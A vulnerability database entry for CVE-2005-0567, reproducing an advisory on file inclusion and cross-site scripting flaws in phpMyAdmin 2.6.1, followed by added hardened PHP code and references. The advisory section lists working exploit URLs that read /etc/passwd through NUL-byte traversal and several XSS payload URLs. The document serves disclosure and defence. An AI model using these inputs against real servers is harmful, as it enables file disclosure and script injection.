phpMyAdmin Multiple Local File Inclusion Vulnerabilities

Vulnerability ID: 1199707    Vulnerability type: Input validation
Published: 2005-05-02    Updated: 2006-09-28
CVE: CVE-2005-0567    CNNVD-ID: CNNVD-200505-085
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2005090049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-085
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities in phpMyAdmin 2.6.1 allow remote attackers to execute arbitrary PHP code by modifying (1) the theme parameter of phpmyadmin.css.php or (2) the cfg[Server][extension] parameter of database_interface.lib.php to reference a URL on a remote web server that contains the code.
|Exploit (EXP)
[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005


--- 0. Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

--- 1. Remote file inclusion ---

1.0

This bug exists in css/phpmyadmin.css.php. You can
include files. The error exists in

Code:
------
// With register_globals=on, both $GLOBALS['cfg']['ThemePath'] and $theme
// can be set from the request, so the whole include path is user-controlled.
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
            $theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
    include($tmp_file);
} // end of include theme_right.css.php
------

And now you can get files.

For example:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
etc.

1.1
The next include is in libraries/database_interface.lib.php

Code:

---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');
---

For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message:
---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
---------------


Or, if you can see PHP errors and register_globals=on, you can make
XSS with the PHP bug. For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

--- 2. XSS aka Cross Site Scripting ---
If register_globals=On:

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

--- 3. How to fix ---

CVS, or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >>
libraries/grab_globals.lib.php, or wait for the new version.

--- 4. Contact ---
Author: Maksymilian Arciemowicz
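The two include sites quoted in section 1 share one root cause: with register_globals on, request parameters overwrite $cfg and $GLOBALS, and those values are spliced straight into a file path. The following is an added example written for this page; it is not phpMyAdmin's code nor the project's actual grab_globals.lib.php fix. It shows hardened counterparts of both includes (a single-segment theme name checked with realpath() against the configured theme directory, and a fixed allowlist for the dbi extension) plus a front-controller check that refuses any request trying to set cfg or GLOBALS. Function names, the allowlist contents and the sample inputs are assumptions; the theme directory is constructed in a temp dir so the script runs stand-alone.

```php
<?php
declare(strict_types=1);

// Added example, not phpMyAdmin's own code or its real patch. Function names,
// the allowlist and the sample inputs below are assumptions for illustration.

// Hardened counterpart of the theme include in css/phpmyadmin.css.php.
// The theme directory comes from trusted configuration only; the theme name
// must be one plain path segment, which excludes '/', '\', '..' and NUL bytes
// (the "passwd%00" vector in the advisory).
function safe_theme_css_path(string $themeDir, string $theme): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $theme)) {
        return null;
    }
    $base = realpath($themeDir);
    $real = realpath($themeDir . '/' . $theme . '/css/theme_right.css.php');
    // realpath() is false for missing files and resolves symlinks, so a final
    // prefix check guarantees the resolved file lies inside the theme directory.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Hardened counterpart of the require_once() in database_interface.lib.php.
// The extension name is matched against a fixed allowlist instead of being
// concatenated into the path.
function safe_dbi_path(string $extension): ?string
{
    $allowed = ['mysql', 'mysqli'];   // assumed allowlist for this example
    if (!in_array($extension, $allowed, true)) {
        return null;
    }
    return './libraries/dbi/' . $extension . '.dbi.lib.php';
}

// Every vector in the advisory depends on request data overwriting $cfg or
// $GLOBALS via register_globals. A front controller can refuse such requests
// before any configuration is read.
function request_overrides_config(array $request): bool
{
    foreach (['cfg', 'GLOBALS'] as $reserved) {
        if (array_key_exists($reserved, $request)) {
            return true;
        }
    }
    return false;
}

// --- demonstration against a constructed theme directory ---
$dir = sys_get_temp_dir() . '/pma_theme_demo_' . getmypid();
mkdir($dir . '/original/css', 0700, true);
file_put_contents($dir . '/original/css/theme_right.css.php', "<?php /* stub */\n");

// Constructed inputs: one legitimate theme and three traversal/NUL attempts.
$themeInputs = ['original', "passwd\0", '../../etc/passwd', 'orig/../original'];
foreach ($themeInputs as $t) {
    $shown = addcslashes($t, "\0..\37");   // make control bytes visible
    printf("theme %-22s => %s\n", '"' . $shown . '"',
        safe_theme_css_path($dir, $t) ?? 'REJECTED');
}
foreach (['mysqli', 'cXIb8O3', '../config'] as $e) {
    printf("extension %-12s => %s\n", $e, safe_dbi_path($e) ?? 'REJECTED');
}
printf("request setting cfg[] rejected: %s\n",
    request_overrides_config(['cfg' => ['Server' => ['extension' => 'x']]]) ? 'yes' : 'no');
printf("ordinary request rejected:      %s\n",
    request_overrides_config(['theme' => 'original']) ? 'yes' : 'no');

// remove the constructed directory again
unlink($dir . '/original/css/theme_right.css.php');
rmdir($dir . '/original/css');
rmdir($dir . '/original');
rmdir($dir);
```

Only the "original" theme and the "mysqli" extension resolve to a path; the other inputs are rejected before any filesystem call, which matters because PHP 8 raises an error when a NUL byte reaches realpath(). The request check is a coarse compensating control for deployments that cannot yet turn register_globals off.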

|References

Source: XF
Name: phpmyadmin-file-include(19465)
Link: http://xforce.iss.net/xforce/xfdb/19465
Source: BID
Name: 12645
Link: http://www.securityfocus.com/bid/12645
Source: sourceforge.net
Link: http://sourceforge.net/tracker/index.php?func=detail&aid=1149381&group_id=23067&atid=377408
Source: SECUNIA
Name: 14382
Link: http://secunia.com/advisories/14382/
Source: www.phpmyadmin.net
Link: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1
Source: BUGTRAQ
Name: 20050224 [SECURITYREASON.COM] phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110929725801154&w=2